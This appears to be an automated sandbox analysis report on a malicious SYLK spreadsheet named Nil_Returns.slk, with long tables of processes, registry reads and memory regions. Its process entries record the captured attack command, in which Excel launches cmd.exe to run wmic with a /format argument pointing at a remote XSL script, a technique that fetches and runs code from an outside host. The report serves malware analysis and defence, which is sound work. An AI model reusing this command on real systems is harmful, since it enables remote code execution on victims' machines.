SLK file using SquiblyTwo | Grouped Behavior
VTI SCORE: 89/100
Target: Windows 10 (64-bit), MS Office 2016 (64-bit) | ms_office
Classification: -

3d479d661bdf4203f2dcdeaa932c3710ffb4a8edb6b0172a94659452d9c5c7f0 (SHA256)

Nil_Returns.slk

Excel Document

Created at 2018-06-26 20:58:00

Notifications (1/1)

The reputation status of contacted URLs and file hashes could not be determined since the reputation service was disabled during the submission.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xed8 Analysis Target Medium excel.exe "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" -
#2 0xccc Child Process Medium cmd.exe CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #1
#4 0xd94 Child Process Medium wmic.exe wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #2
#8 0xcd4 Child Process Medium cmd.exe CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #1
#10 0x434 Child Process Medium wmic.exe wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl" #8

Behavior Information - Grouped by Category

Process #1: excel.exe
0 0
Information Value
ID #1
File Name c:\program files\microsoft office\office16\excel.exe
Command Line "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:10:09
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xed8
Parent PID 0x4f8 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xC88
0xC7C
0xC58
0xC3C
0xC2C
0xC18
0xC04
0x36C
0xFF4
0xFF0
0xFD0
0xFA8
0xFA0
0xF94
0xF84
0xF30
0xF20
0xF18
0xF14
0xF10
0xF08
0xF04
0xF00
0xEFC
0xEF8
0xEF4
0xEF0
0xEEC
0xEE0
0xEDC
0xB10
0x2DC
0xF1C
0xF74
0xDE4
0xB88
0xB50
0xC28
0xC40
0xC54
0x774
0xF98
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000818fe00000 0x818fe00000 0x818fffffff Private Memory Readable, Writable True False False -
private_0x0000008190000000 0x8190000000 0x81900fffff Private Memory Readable, Writable True False False -
private_0x0000008190100000 0x8190100000 0x81901fffff Private Memory Readable, Writable True False False -
private_0x0000008190200000 0x8190200000 0x81902fffff Private Memory Readable, Writable True False False -
private_0x0000008190300000 0x8190300000 0x81903fffff Private Memory Readable, Writable True False False -
private_0x0000008190400000 0x8190400000 0x81904fffff Private Memory Readable, Writable True False False -
private_0x0000008190500000 0x8190500000 0x81905fffff Private Memory Readable, Writable True False False -
private_0x0000008190600000 0x8190600000 0x81906fffff Private Memory Readable, Writable True False False -
private_0x0000008190700000 0x8190700000 0x81907fffff Private Memory Readable, Writable True False False -
private_0x0000008190800000 0x8190800000 0x81908fffff Private Memory Readable, Writable True False False -
private_0x0000008190900000 0x8190900000 0x81909fffff Private Memory Readable, Writable True False False -
private_0x0000008190b00000 0x8190b00000 0x8190bfffff Private Memory Readable, Writable True False False -
private_0x0000008190c00000 0x8190c00000 0x8190cfffff Private Memory Readable, Writable True False False -
private_0x0000008190d00000 0x8190d00000 0x8190dfffff Private Memory Readable, Writable True False False -
private_0x0000008190f00000 0x8190f00000 0x8190ffffff Private Memory Readable, Writable True False False -
private_0x0000008191000000 0x8191000000 0x81910fffff Private Memory Readable, Writable True False False -
private_0x0000008191100000 0x8191100000 0x81911fffff Private Memory Readable, Writable True False False -
private_0x0000008191200000 0x8191200000 0x81912fffff Private Memory Readable, Writable True False False -
private_0x0000008191300000 0x8191300000 0x81913fffff Private Memory Readable, Writable True False False -
private_0x0000008191400000 0x8191400000 0x81914fffff Private Memory Readable, Writable True False False -
private_0x0000008191500000 0x8191500000 0x81915fffff Private Memory Readable, Writable True False False -
private_0x0000008191600000 0x8191600000 0x81916fffff Private Memory Readable, Writable True False False -
private_0x0000008191700000 0x8191700000 0x81917fffff Private Memory Readable, Writable True False False -
private_0x0000008191800000 0x8191800000 0x81918fffff Private Memory Readable, Writable True False False -
private_0x0000008191900000 0x8191900000 0x81919fffff Private Memory Readable, Writable True False False -
private_0x0000008191a00000 0x8191a00000 0x8191afffff Private Memory Readable, Writable True False False -
private_0x0000008191b00000 0x8191b00000 0x8191bfffff Private Memory Readable, Writable True False False -
private_0x0000008191c00000 0x8191c00000 0x8191cfffff Private Memory Readable, Writable True False False -
private_0x0000008191e00000 0x8191e00000 0x8191efffff Private Memory Readable, Writable True False False -
private_0x0000008191f00000 0x8191f00000 0x8191ffffff Private Memory Readable, Writable True False False -
private_0x0000008192000000 0x8192000000 0x81920fffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a380000 0x20f8a380000 0x20f8a38ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8a390000 0x20f8a390000 0x20f8a396fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a3a0000 0x20f8a3a0000 0x20f8a3b4fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a3c0000 0x20f8a3c0000 0x20f8a3c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a3d0000 0x20f8a3d0000 0x20f8a3d0fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a3e0000 0x20f8a3e0000 0x20f8a3e1fff Private Memory Readable, Writable True False False -
locale.nls 0x20f8a3f0000 0x20f8a4adfff Memory Mapped File Readable False False False -
pagefile_0x0000020f8a4b0000 0x20f8a4b0000 0x20f8a4b1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a4c0000 0x20f8a4c0000 0x20f8a4c6fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4d0000 0x20f8a4d0000 0x20f8a4d0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4e0000 0x20f8a4e0000 0x20f8a4e0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a4f0000 0x20f8a4f0000 0x20f8a4f0fff Private Memory Readable, Writable True False False -
private_0x0000020f8a500000 0x20f8a500000 0x20f8a500fff Private Memory Readable, Writable True False False -
private_0x0000020f8a510000 0x20f8a510000 0x20f8a60ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a610000 0x20f8a610000 0x20f8a611fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8a620000 0x20f8a620000 0x20f8a62ffff Private Memory - True False False -
pagefile_0x0000020f8a630000 0x20f8a630000 0x20f8a631fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a640000 0x20f8a640000 0x20f8a641fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a650000 0x20f8a650000 0x20f8a651fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a660000 0x20f8a660000 0x20f8a661fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a670000 0x20f8a670000 0x20f8a671fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a680000 0x20f8a680000 0x20f8a680fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f8a690000 0x20f8a690000 0x20f8a691fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a6a0000 0x20f8a6a0000 0x20f8a6cdfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8a6d0000 0x20f8a6d0000 0x20f8a6dffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8a6e0000 0x20f8a6e0000 0x20f8a867fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8a870000 0x20f8a870000 0x20f8a9f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f8aa00000 0x20f8aa00000 0x20f8bdfffff Pagefile Backed Memory Readable True False False -
private_0x0000020f8be00000 0x20f8be00000 0x20f8be00fff Private Memory Readable, Writable True False False -
private_0x0000020f8be10000 0x20f8be10000 0x20f8be10fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8be20000 0x20f8be20000 0x20f8bedbfff Pagefile Backed Memory Readable True False False -
private_0x0000020f8bee0000 0x20f8bee0000 0x20f8befffff Private Memory Readable, Writable True False False -
office.odf 0x20f8bf00000 0x20f8c0b8fff Memory Mapped File Readable False False False -
pagefile_0x0000020f8c0c0000 0x20f8c0c0000 0x20f8c0c3fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c0d0000 0x20f8c0d0000 0x20f8c0d6fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c0e0000 0x20f8c0e0000 0x20f8c0e1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c0f0000 0x20f8c0f0000 0x20f8c1effff Private Memory Readable, Writable True False False -
private_0x0000020f8c1f0000 0x20f8c1f0000 0x20f8c1f0fff Private Memory Readable, Writable True False False -
private_0x0000020f8c200000 0x20f8c200000 0x20f8c200fff Private Memory Readable, Writable True False False -
private_0x0000020f8c210000 0x20f8c210000 0x20f8c210fff Private Memory Readable, Writable True False False -
msointl30.dll 0x20f8c220000 0x20f8c22efff Memory Mapped File Readable False False False -
private_0x0000020f8c230000 0x20f8c230000 0x20f8c236fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c240000 0x20f8c240000 0x20f8c240fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f8c250000 0x20f8c250000 0x20f8c25ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f8c260000 0x20f8c260000 0x20f8c264fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f8c270000 0x20f8c270000 0x20f8c270fff Pagefile Backed Memory Readable True False False -
private_0x0000020f8c280000 0x20f8c280000 0x20f8c28ffff Private Memory Readable, Writable True False False -
mso40uires.dll 0x20f8c290000 0x20f8c597fff Memory Mapped File Readable False False False -
mso99lres.dll 0x20f8c5a0000 0x20f8cec0fff Memory Mapped File Readable False False False -
msores.dll 0x20f8ced0000 0x20f91d0efff Memory Mapped File Readable False False False -
xlintl32.dll 0x20f91d10000 0x20f92d51fff Memory Mapped File Readable False False False -
sortdefault.nls 0x20f92d60000 0x20f93096fff Memory Mapped File Readable False False False -
pagefile_0x0000020f930a0000 0x20f930a0000 0x20f93591fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f935a0000 0x20f935a0000 0x20f935a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f935b0000 0x20f935b0000 0x20f935b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f935c0000 0x20f935c0000 0x20f935c0fff Private Memory Readable, Writable True False False -
private_0x0000020f935d0000 0x20f935d0000 0x20f935d0fff Private Memory Readable, Writable True False False -
private_0x0000020f935e0000 0x20f935e0000 0x20f935e0fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f935f0000 0x20f935f0000 0x20f935f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f93600000 0x20f93600000 0x20f93600fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f93610000 0x20f93610000 0x20f93610fff Private Memory Readable, Writable True False False -
private_0x0000020f93620000 0x20f93620000 0x20f93620fff Private Memory Readable, Writable True False False -
private_0x0000020f93630000 0x20f93630000 0x20f9363ffff Private Memory Readable, Writable True False False -
msointl.dll 0x20f93640000 0x20f937bafff Memory Mapped File Readable False False False -
pagefile_0x0000020f937c0000 0x20f937c0000 0x20f93fbffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f93fc0000 0x20f93fc0000 0x20f940bffff Private Memory Readable, Writable True False False -
private_0x0000020f940c0000 0x20f940c0000 0x20f942bffff Private Memory Readable, Writable True False False -
private_0x0000020f942c0000 0x20f942c0000 0x20f943bffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f943c0000 0x20f943c0000 0x20f9444bfff Pagefile Backed Memory Readable True False False -
private_0x0000020f94450000 0x20f94450000 0x20f94450fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f94460000 0x20f94460000 0x20f9446bfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f94470000 0x20f94470000 0x20f94471fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020f94480000 0x20f94480000 0x20f9448bfff Pagefile Backed Memory Readable, Writable True False False -
normidna.nls 0x20f94490000 0x20f944a1fff Memory Mapped File Readable False False False -
comdlg32.dll.mui 0x20f944b0000 0x20f944bcfff Memory Mapped File Readable False False False -
pagefile_0x0000020f944c0000 0x20f944c0000 0x20f944c1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f944d0000 0x20f944d0000 0x20f944d0fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f944e0000 0x20f944e0000 0x20f944e1fff Pagefile Backed Memory Readable True False False -
explorerframe.dll.mui 0x20f944f0000 0x20f944f6fff Memory Mapped File Readable False False False -
private_0x0000020f94500000 0x20f94500000 0x20f94503fff Private Memory Readable, Writable True False False -
private_0x0000020f94510000 0x20f94510000 0x20f94513fff Private Memory Readable, Writable True False False -
private_0x0000020f94520000 0x20f94520000 0x20f94523fff Private Memory Readable, Writable True False False -
private_0x0000020f94530000 0x20f94530000 0x20f94530fff Private Memory Readable, Writable True False False -
private_0x0000020f94540000 0x20f94540000 0x20f94542fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f94550000 0x20f94550000 0x20f9456efff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f94570000 0x20f94570000 0x20f9458efff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f94590000 0x20f94590000 0x20f94590fff Private Memory Readable, Writable True False False -
private_0x0000020f945a0000 0x20f945a0000 0x20f945a0fff Private Memory Readable, Writable True False False -
private_0x0000020f945b0000 0x20f945b0000 0x20f945b0fff Private Memory Readable, Writable True False False -
private_0x0000020f945c0000 0x20f945c0000 0x20f949bffff Private Memory Readable, Writable True False False -
pagefile_0x0000020f949c0000 0x20f949c0000 0x20f949c1fff Pagefile Backed Memory Readable True False False -
private_0x0000020f949d0000 0x20f949d0000 0x20f949d0fff Private Memory Readable, Writable True False False -
~fontcache-system.dat 0x20f949e0000 0x20f94a55fff Memory Mapped File Readable False False False -
~fontcache-fontface.dat 0x20f94a60000 0x20f95a5ffff Memory Mapped File Readable False False False -
~fontcache-s-1-5-21-2172869166-1497266965-2109836178-1000.dat 0x20f95a60000 0x20f9625ffff Memory Mapped File Readable False False False -
segoeui.ttf 0x20f96260000 0x20f9633efff Memory Mapped File Readable False False False -
d2d1.dll.mui 0x20f96340000 0x20f96381fff Memory Mapped File Readable False False False -
private_0x0000020f96390000 0x20f96390000 0x20f9678ffff Private Memory Readable, Writable True False False -
private_0x0000020f96790000 0x20f96790000 0x20f96f8ffff Private Memory Readable, Writable True False False -
segoeuil.ttf 0x20f96f90000 0x20f97063fff Memory Mapped File Readable False False False -
seguisb.ttf 0x20f97070000 0x20f97152fff Memory Mapped File Readable False False False -
segoeuib.ttf 0x20f97160000 0x20f9723bfff Memory Mapped File Readable False False False -
private_0x0000020f97240000 0x20f97240000 0x20f97240fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f97250000 0x20f97250000 0x20f97325fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f97330000 0x20f97330000 0x20f97330fff Private Memory Readable, Writable True False False -
pagefile_0x0000020f97340000 0x20f97340000 0x20f97375fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f97380000 0x20f97380000 0x20f9738ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f97390000 0x20f97390000 0x20f9739ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020f973a0000 0x20f973a0000 0x20f973affff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020f973b0000 0x20f973b0000 0x20f977b7fff Private Memory Readable, Writable True False False -
private_0x0000020f977c0000 0x20f977c0000 0x20f97bd0fff Private Memory Readable, Writable True False False -
private_0x0000020f97be0000 0x20f97be0000 0x20f97fe2fff Private Memory Readable, Writable True False False -
private_0x0000020f97ff0000 0x20f97ff0000 0x20f97ff0fff Private Memory Readable, Writable True False False -
private_0x0000020f98000000 0x20f98000000 0x20f98000fff Private Memory Readable, Writable True False False -
private_0x0000020f98010000 0x20f98010000 0x20f9808ffff Private Memory Readable, Writable True False False -
c_1255.nls 0x20f98090000 0x20f980a0fff Memory Mapped File Readable False False False -
staticcache.dat 0x20f980b0000 0x20f990effff Memory Mapped File Readable False False False -
cversions.2.db 0x20f990f0000 0x20f990f3fff Memory Mapped File Readable True False False -
For performance reasons, the remaining 335 entries are omitted.
The remaining entries can be found in flog.txt.
Process #2: cmd.exe
48 0
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:09:53
OS Process Information
Information Value
PID 0xccc
Parent PID 0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xE0
0xE24
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000194dd00000 0x194dd00000 0x194ddfffff Private Memory Readable, Writable True False False -
private_0x000000194de00000 0x194de00000 0x194dffffff Private Memory Readable, Writable True False False -
private_0x000000194e000000 0x194e000000 0x194e0fffff Private Memory Readable, Writable True False False -
private_0x000001ebe75c0000 0x1ebe75c0000 0x1ebe75dffff Private Memory Readable, Writable True False False -
pagefile_0x000001ebe75c0000 0x1ebe75c0000 0x1ebe75cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000001ebe75d0000 0x1ebe75d0000 0x1ebe75d6fff Private Memory Readable, Writable True False False -
pagefile_0x000001ebe75e0000 0x1ebe75e0000 0x1ebe75f4fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001ebe7600000 0x1ebe7600000 0x1ebe7603fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001ebe7610000 0x1ebe7610000 0x1ebe7610fff Pagefile Backed Memory Readable True False False -
private_0x000001ebe7620000 0x1ebe7620000 0x1ebe7621fff Private Memory Readable, Writable True False False -
private_0x000001ebe7630000 0x1ebe7630000 0x1ebe772ffff Private Memory Readable, Writable True False False -
locale.nls 0x1ebe7730000 0x1ebe77edfff Memory Mapped File Readable False False False -
private_0x000001ebe77f0000 0x1ebe77f0000 0x1ebe77f6fff Private Memory Readable, Writable True False False -
private_0x000001ebe7970000 0x1ebe7970000 0x1ebe797ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x1ebe7980000 0x1ebe7cb6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ffa10000 0x7df5ffa10000 0x7ff5ffa0ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff648e50000 0x7ff648e50000 0x7ff648f4ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648f50000 0x7ff648f50000 0x7ff648f72fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff649110000 0x7ff649169fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (7)
Operation Filename Additional Information Success Count
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 2
Open STD_OUTPUT_HANDLE - True 3
Open STD_INPUT_HANDLE - True 2
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Windows\System32\Wbem\WMIC.exe os_pid = 0xd94, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff649110000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 2
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260 True 1
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffc17148940 True 1
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffc17147460 True 1
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 True 1
Environment (15)
Operation Additional Information Success Count
Get Environment String - True 5
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Users\Nd9E1FYi\Desktop True 1
Set Environment String name = COPYCMD True 1
Process #4: wmic.exe
769 285
Information Value
ID #4
File Name c:\windows\system32\wbem\wmic.exe
Command Line wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:48, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:09:52
OS Process Information
Information Value
PID 0xd94
Parent PID 0xccc (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xDF0
0x3B0
0xE44
0xE4C
0xE58
0xE54
0xD84
0xE68
0xE6C
0x13C
0xA44
0xABC
0xDDC
0xDD8
0xEC4
0xCC4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
msvcr80.dll 0x5cfe0000 0x5d0a8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000003500000000 0x3500000000 0x35001fffff Private Memory Readable, Writable True False False -
private_0x0000003500200000 0x3500200000 0x350027ffff Private Memory Readable, Writable True False False -
private_0x0000003500280000 0x3500280000 0x35002fffff Private Memory Readable, Writable True False False -
private_0x0000003500300000 0x3500300000 0x350037ffff Private Memory Readable, Writable True False False -
private_0x0000003500380000 0x3500380000 0x35003fffff Private Memory Readable, Writable True False False -
private_0x0000003500400000 0x3500400000 0x350047ffff Private Memory Readable, Writable True False False -
private_0x0000003500480000 0x3500480000 0x35004fffff Private Memory Readable, Writable True False False -
private_0x0000003500500000 0x3500500000 0x350057ffff Private Memory Readable, Writable True False False -
private_0x00000233e1000000 0x233e1000000 0x233e101ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1000000 0x233e1000000 0x233e100ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000233e1010000 0x233e1010000 0x233e1016fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1020000 0x233e1020000 0x233e1034fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1040000 0x233e1040000 0x233e1043fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1050000 0x233e1050000 0x233e1050fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1060000 0x233e1060000 0x233e1061fff Private Memory Readable, Writable True False False -
locale.nls 0x233e1070000 0x233e112dfff Memory Mapped File Readable False False False -
private_0x00000233e1130000 0x233e1130000 0x233e1136fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1140000 0x233e1140000 0x233e1140fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1150000 0x233e1150000 0x233e1150fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1160000 0x233e1160000 0x233e11dffff Private Memory Readable, Writable True False False -
private_0x00000233e1160000 0x233e1160000 0x233e11bffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1160000 0x233e1160000 0x233e1161fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1170000 0x233e1170000 0x233e1170fff Pagefile Backed Memory Readable, Writable True False False -
msxml3r.dll 0x233e1180000 0x233e1180fff Memory Mapped File Readable False False False -
private_0x00000233e1190000 0x233e1190000 0x233e11affff Private Memory - True False False -
private_0x00000233e11b0000 0x233e11b0000 0x233e11bffff Private Memory Readable, Writable True False False -
wmic.exe.mui 0x233e11c0000 0x233e11cffff Memory Mapped File Readable False False False -
private_0x00000233e11d0000 0x233e11d0000 0x233e11dffff Private Memory Readable, Writable True False False -
private_0x00000233e11e0000 0x233e11e0000 0x233e11e0fff Private Memory Readable, Writable True False False -
private_0x00000233e11f0000 0x233e11f0000 0x233e11f0fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1200000 0x233e1200000 0x233e1200fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1200000 0x233e1200000 0x233e1203fff Pagefile Backed Memory Readable True False False -
private_0x00000233e1210000 0x233e1210000 0x233e130ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x233e1310000 0x233e13ecfff Memory Mapped File Readable False False False -
ole32.dll 0x233e1310000 0x233e1452fff Memory Mapped File Readable False False False -
private_0x00000233e1310000 0x233e1310000 0x233e14dffff Private Memory Readable, Writable True False False -
private_0x00000233e1310000 0x233e1310000 0x233e144ffff Private Memory Readable, Writable True False False -
private_0x00000233e1310000 0x233e1310000 0x233e138ffff Private Memory Readable, Writable True False False -
imm32.dll 0x233e1310000 0x233e1348fff Memory Mapped File Readable False False False -
private_0x00000233e1310000 0x233e1310000 0x233e1310fff Private Memory Readable, Writable True False False -
private_0x00000233e1320000 0x233e1320000 0x233e1320fff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1330000 0x233e1330000 0x233e134ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000233e1330000 0x233e1330000 0x233e1330fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x233e1340000 0x233e1340fff Memory Mapped File Readable, Writable True False False -
pagefile_0x00000233e1350000 0x233e1350000 0x233e1350fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000233e1360000 0x233e1360000 0x233e136ffff Pagefile Backed Memory Readable True False False -
private_0x00000233e1370000 0x233e1370000 0x233e1371fff Private Memory Readable, Writable True False False -
private_0x00000233e1370000 0x233e1370000 0x233e1376fff Private Memory Readable, Writable True False False -
private_0x00000233e1380000 0x233e1380000 0x233e138ffff Private Memory Readable, Writable True False False -
c_20127.nls 0x233e1390000 0x233e13a0fff Memory Mapped File Readable False False False -
pagefile_0x00000233e13b0000 0x233e13b0000 0x233e13b0fff Pagefile Backed Memory Readable True False False -
